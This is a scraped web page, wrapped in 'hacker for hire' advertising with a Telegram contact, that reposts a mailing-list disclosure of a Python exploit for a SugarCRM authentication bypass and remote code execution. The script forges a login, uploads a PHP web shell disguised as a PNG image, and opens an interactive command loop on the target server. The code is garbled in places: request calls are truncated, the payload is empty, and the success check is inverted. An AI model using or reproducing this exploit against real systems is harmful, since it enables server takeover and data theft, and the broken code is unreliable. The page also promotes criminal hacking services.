Data center: Ashburn, VA

Telegram Chat : MBHH_x86

Email Us:

Mobile Hacker For Hire, hire a hacker, hiring a hacker, hacker with proof

SugarCRM 0-day Auth Bypass + RCE Exploit

Table of Contents

From: “sw33t.0day via Fulldisclosure” <fulldisclosure () seclists org>
Date: Wed, 28 Dec 2022 08:42:12 +0000

#!/usr/bin/env python
# SugarCRM 0-day Auth Bypass + RCE Exploit
# Dorks:

import base64, re, requests, sys, uuid


if len(sys.argv) != 2:
        sys.exit("Usage: %s [URL]" % sys.argv[0])
print "[+] Sending authentication request"

url     = sys.argv[1] + "/index.php"
session = {"PHPSESSID": str(uuid.uuid4())}
params  = {"module": "Users", "action": "Authenticate", "user_name": 1, "user_password": 1}, cookies=session, data=params, verify=False)

print "[+] Uploading PHP shell\n"

png_sh = 
upload = {"file": ("sweet.phar", base64.b64decode(png_sh), "image/png")} # you can also try with other extensions like 
.php7 .php5 or .phtml
params = {"module": "EmailTemplates", "action": "AttachFiles"}, cookies=session, data=params, files=upload, verify=False)

url = sys.argv[1] + "/cache/images/sweet.phar"

while True:
        cmd = raw_input("# ")
        res =, data={"c": base64.b64encode(cmd)}, verify=False)
        res ="#####(.*)#####", res.text, re.DOTALL)
        if res:
                sys.exit("\n[+] Failure!\n")
Sent through the Full Disclosure mailing list
Web Archives & RSS:

Current thread:

  • SugarCRM 0-day Auth Bypass + RCE Exploit sw33t.0day via Fulldisclosure (Dec 30)

Leave a Reply

Your email address will not be published. Required fields are marked *

error: Content is protected !!